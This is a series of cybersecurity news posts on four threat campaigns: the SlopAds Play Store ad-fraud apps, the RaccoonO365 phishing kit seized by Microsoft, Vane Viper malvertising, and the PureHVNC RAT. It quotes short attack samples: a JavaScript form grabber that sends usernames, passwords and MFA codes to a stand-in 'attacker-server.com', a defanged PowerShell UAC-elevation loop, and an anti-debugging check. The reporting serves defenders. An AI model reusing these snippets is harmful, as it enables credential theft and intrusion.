A sophisticated mobile ad fraud operation dubbed “SlopAds” has infiltrated Google Play Store with 224 malicious applications that collectively amassed over 38 million downloads across 228 countries and territories.

The campaign represents one of the most extensive mobile fraud schemes discovered to date, utilizing advanced steganography techniques and multi-layered obfuscation to deliver fraudulent advertising payloads while evading detection mechanisms.

The threat actors behind SlopAds demonstrated remarkable sophistication by implementing a conditional fraud system that only activated when users downloaded apps through specific advertising campaigns, rather than organic Play Store visits.

This selective activation mechanism helped the malicious applications maintain their presence on the platform for extended periods while appearing legitimate to casual users and automated security systems.

Human Security analysts identified the operation while investigating anomalous patterns in their Ad Fraud Defense solution data.

The researchers discovered that SlopAds applications were generating approximately 2.3 billion fraudulent bid requests daily at peak operation, with traffic distribution heavily concentrated in the United States (30%), India (10%), and Brazil (7%).

The campaign’s global reach and massive scale underscore the threat actors’ sophisticated infrastructure and operational capabilities.

The malicious applications employed Firebase Remote Config, a legitimate Google development tool, to retrieve encrypted configuration data containing URLs for downloading the primary fraud module called “FatModule.”

This abuse of trusted development platforms demonstrates how cybercriminals increasingly leverage legitimate services to mask their malicious activities and avoid detection by security solutions.

Advanced Steganographic Payload Delivery System

SlopAds employed a particularly innovative payload delivery mechanism that showcased the evolving sophistication of mobile malware operations.

The system utilized digital steganography to hide malicious code within seemingly innocuous PNG image files, effectively bypassing traditional security scanning methods that focus on executable file analysis.

When an infected application passed initial verification checks, command-and-control servers delivered four specially crafted PNG files through encrypted ZIP archives.

These images contained hidden APK components that, when decrypted and reassembled, formed the complete FatModule responsible for executing the fraud operations.

The steganographic approach allowed the malicious payload to traverse network security filters and application store scanning systems without triggering conventional malware detection algorithms.

The FatModule incorporated multiple anti-analysis features, including debugging tool detection that specifically searched for hooking frameworks, Xposed modules, and Frida instrumentation tools commonly used by security researchers.

Additionally, the module employed string encryption throughout its codebase and utilized packed native code to obscure its true functionality from static analysis tools.

public static Boolean m45535a() {
    try {
        StackTraceElement[] stackTrace = Thread.currentThread().getStackTrace();
        for (StackTraceElement element : stackTrace) {
            String className = element.getClassName() + "#" + element.getMethodName();
            if (className.toLowerCase().contains("hook") || 
                className.toLowerCase().contains("xpose") || 
                className.toLowerCase().contains("frida")) {
                return true;
            }
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
    return false;
}

The fraud execution occurred within hidden WebViews that collected comprehensive device fingerprinting data, including hardware specifications, network information, and GPU details.

This information enabled precise targeting while the hidden interfaces navigated to threat actor-controlled cashout domains, generating fraudulent advertisement impressions and clicks without user awareness or interaction.

Google has since removed all identified SlopAds applications from the Play Store, and users receive automatic protection through Google Play Protect, which warns against and blocks installation of known malicious applications even from third-party sources.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

The post 224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads appeared first on Cyber Security News.

Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform known as RaccoonO365 to harvest Microsoft 365 credentials at scale.

Emerging as an off-the-shelf service, RaccoonO365 requires minimal technical skill, allowing threat actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.

These kits replicate Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.

As of September 2025, this operation has affected over 5,000 accounts across 94 countries, demonstrating the pervasive risk posed by commoditized social engineering tools.

In a coordinated legal action, Microsoft’s Digital Crimes Unit (DCU) secured a court order from the Southern District of New York to seize 338 domains facilitating the distribution of RaccoonO365, effectively dismantling the platform’s core infrastructure.

Microsoft analysts noted the rapid evolution of this service, which now boasts features that subvert MFA protections and automate credential harvesting at rates up to 9,000 targets per day.

The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks.

Although not all stolen credentials resulted in direct network intrusions, the impact on high-value sectors, particularly healthcare, was severe.

At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.

Microsoft’s partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.

The DCU’s swift intervention illustrates the necessity of legal and technical countermeasures against low-barrier tools that empower malicious actors.

Microsoft analysts identified Joshua Ogundipe, a Nigeria-based developer, as the principal architect of RaccoonO365.

Through an operational security lapse revealing a cryptocurrency wallet, investigators traced over US$100,000 in subscription payments.

Ogundipe’s Telegram channel, with more than 850 members, advertised both standard phishing kits and a newly introduced “AI-MailCheck” service designed to refine spear-phishing efficacy.

This attribution underscores how streamlined criminal enterprises can scale with minimal overhead, challenging defenders to anticipate modular threat services.

Infection Mechanism Deep Dive

RaccoonO365’s infection mechanism revolves around dynamic form injection and transparent redirection tactics.

When a victim clicks a malicious link, the browser is redirected to a decoy login page that mirrors Microsoft’s official portal.

A small JavaScript snippet, injected at runtime, captures input fields and forwards credentials to the attacker’s server:-

document.querySelector('form').addEventListener('submit', function(e) {
  e.preventDefault();
  let creds = {
    user: document.getElementById('username').value,
    pass: document.getElementById('password').value,
    otp: document.getElementById('mfa').value
  };
  fetch('https://attacker-server.com/collect', {
    method: 'POST',
    body: JSON.stringify(creds),
    headers: {'Content-Type': 'application/json'}
  }).then(()=> window.location.href = 'https://login.microsoftonline.com');
});

This code ensures seamless data exfiltration while redirecting users to the legitimate login page, minimizing suspicion.

Advanced operators employ session-token reuse and header manipulation to bypass MFA prompts.

Combined with automated email distribution and AI-driven content variation, this infection chain exemplifies modern phishing sophistication and underscores the critical importance of layered defenses and user awareness.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

The post Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service appeared first on Cyber Security News.

The digital advertising ecosystem has become a prime hunting ground for cybercriminals, who are increasingly exploiting advertising technology companies to distribute malware and conduct malicious campaigns.

Rather than simply abusing legitimate platforms, threat actors are now operating as the platforms themselves, creating a sophisticated web of deception that leverages the inherent complexity and fragmentation of the adtech supply chain to avoid accountability.

Recent investigations have uncovered a massive operation involving Vane Viper, a threat actor that has appeared in approximately half of customer networks monitored by security researchers, generating about one trillion DNS queries over the past year.

This operation benefits from hundreds of thousands of compromised websites and strategically placed advertisements across gaming, shopping, and blog sites worldwide.

The actor’s infrastructure spans approximately 60,000 domains, representing only a fraction of the broader malicious ecosystem they control.

The sophistication of this campaign lies in its carefully constructed corporate structure designed for plausible deniability.

Corporate filings trace Vane Viper to AdTech Holding, a Cyprus-based company whose flagship subsidiary, PropellerAds, operates as both an advertising network and traffic broker.

Infoblox researchers identified compelling evidence suggesting that PropellerAds has moved beyond merely turning a blind eye to criminal abuse of their platform, with indicators pointing to several ad-fraud campaigns originating directly from infrastructure attributed to the company.

The malvertising operation employs a complex traffic distribution system (TDS) that routes users through multiple layers of redirection before delivering malicious payloads.

This approach allows the actors to serve legitimate content to automated security tools while directing human users to malicious destinations.

The campaign’s reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content designed to maximize profit from compromised traffic.

Push Notification Persistence Mechanism

The most insidious aspect of Vane Viper’s operation involves the abuse of browser push notifications to achieve persistent access to victim devices.

The campaign utilizes malicious service workers, JavaScript files that intercept network requests between web applications and servers, to manipulate browser behavior and maintain long-term access to compromised systems.

These service workers employ script chaining techniques to abuse push notifications, with the most concerning element being their use of the eval() function to execute arbitrary content fetched from remote URLs.

The remote URL is determined by hardcoded domains within the service worker, creating a dynamic command and control mechanism that can adapt to changing operational requirements.

Once users accept push notifications, their devices become part of a persistent malvertising network, enabling a continuous stream of malicious advertisements.

The operation demonstrates remarkable resilience through its domain management strategy, cycling through thousands of newly registered domains each month while maintaining key push notification domains for years.

Analysis reveals that most operational domains remain active for less than a month, with registration counts reaching 3,500 domains in peak months, while core infrastructure domains like omnatuor.com, propeller-tracking.com, and various push notification services including in-page-push.com and pushimg.com have maintained operations for over 1,200 days, ensuring operational continuity despite takedown attempts.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

The post Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads appeared first on Cyber Security News.

The PureHVNC remote administration tool (RAT) has emerged as a sophisticated component of the Pure malware family, gaining prominence in mid-2025 amid an uptick in targeted intrusion campaigns.

Originating from underground forums and Telegram channels, PureHVNC is marketed by its author, known as PureCoder, alongside companion tools such as PureCrypter, PureLogs, and PureMiner.

Its adoption by cybercriminal customers reflects a growing demand for modular malware suites capable of stealthy full system control and data exfiltration.

Initial deployments have leveraged the ClickFix phishing technique, luring victims with counterfeit job offers to execute malicious scripts, setting the stage for multi-stage intrusions.

In one notable incident, attackers deployed a Rust Loader, followed by PureHVNC RAT and the Sliver command-and-control framework over an eight-day window.

Check Point analysts noted that during this campaign, PureHVNC communicated with its control server to retrieve three GitHub URLs hosting supporting modules, directly implicating the developer’s own GitHub accounts in the malware’s operational infrastructure.

These GitHub repositories contained browser driver executables and plugin files essential for TwitchBot and YouTubeBot functionalities, illustrating an unusual developer-sourced supply chain for malware support files.

Beyond its initial infiltration tactics, PureHVNC demonstrates advanced capabilities for persistence and privilege escalation.

Upon execution, the RAT registers itself via scheduled tasks named to mimic legitimate Google Updater services, ensuring resilience across reboots.

If running without administrative privileges, it prompts a UAC elevation loop using PowerShell:-

while ($true) {
    Start-Process -FilePath cmd[.]exe -Verb runas -ArgumentList 'regsvr32[.]exe MALWARE[.]dll --typerenderer'
    exit
}

Once elevated, the loader establishes a mutex (MistyRoseNavy) to prevent duplicate execution and creates a scheduled task with a one-minute repetition interval.

This approach, combined with AMSI bypass via an LdrLoadDll hook, allows PureHVNC to remain undetected by real-time defenses while maintaining control of the endpoint.

Infection Mechanism

PureHVNC’s initial loader is a .NET assembly delivered by the Rust Loader shellcode. The loader decrypts its payload using ChaCha20-Poly1305, validates payload size against a 1 KB threshold, and allocates executable memory to host the decrypted .NET assembly.

The embedded assembly is then loaded and executed, initializing the RAT’s main loop. Communication is established over SSL streams, where the bot sends Gzip-compressed system information—including OS version, installed antivirus products, and metadata like campaign ID—to the C2 server.

Incoming commands are received as compressed buffers, decompressed, deserialized, and dispatched to plugin threads for execution.

By segmenting payload delivery and employing encryption and compression, PureHVNC evades static signature detection and complicates network-based discovery, underscoring its stealthy infection mechanism.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free

The post PureHVNC RAT Developers Leverage GitHub Host Source Code appeared first on Cyber Security News.